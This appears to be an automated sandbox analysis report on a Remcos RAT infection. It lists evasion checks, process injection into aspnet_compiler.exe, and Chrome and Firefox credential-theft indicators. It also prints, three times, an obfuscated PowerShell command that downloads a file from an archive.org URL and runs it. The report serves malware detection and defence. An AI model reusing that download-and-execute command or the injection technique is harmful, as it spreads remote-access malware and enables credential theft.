Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0040D2AE Sleep,ExitProcess,

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3406
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5553
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5140

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6756	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6932	Thread sleep count: 3700 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928	Thread sleep count: 5140 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6776	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6772	Thread sleep count: 57 > 30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00406176 FindFirstFileW,FindNextFileW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040A216 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004452E9 FindFirstFileExA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0040A431 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00407C57 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00414C1B FindFirstFileW,FindNextFileW,FindNextFileW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00416F26 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000001.00000002.608901756.000001E84EC80000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(Msi!
Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000001.00000002.609060985.000001E84F000000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0042EEF9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0043B629 mov eax, dword ptr fs:[00000030h]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0044663E GetProcessHeap,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042F047 SetUnhandledExceptionFilter,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042F49C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0042EEF9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_00435F29 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell download and execute

Show sources

Source: Yara match	File source: 00000001.00000002.595371615.000001E834AF6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.597766060.000001E836880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6632, type: MEMORY

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_00413998 __EH_prolog,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 452000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 469000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46D000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 474000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: AC7008

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_004147AA StrToIntA,mouse_event,

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\ Microsoft.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')\|I`E`X

Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: powershell.exe, 00000001.00000002.595778841.000001E834F40000.00000002.00000001.sdmp, aspnet_compiler.exe, 00000010.00000002.595499968.00000000015C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0042F125 cpuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetLocaleInfoA,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0041515E __EH_prolog,GdiplusStartup,CreateDirectoryW,Sleep,Sleep,GetLocalTime,Sleep,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0041657D GetComputerNameExW,GetUserNameW,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0044154E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000010.00000002.595080191.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.594396600.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6984, type: MEMORY
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

Contains functionality to steal Firefox passwords or cookies

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: \key3.db

Remote Access Functionality:

Detected Remcos RAT

Show sources

Source: aspnet_compiler.exe	String found in binary or memory: Remcos_Mutex_Inj
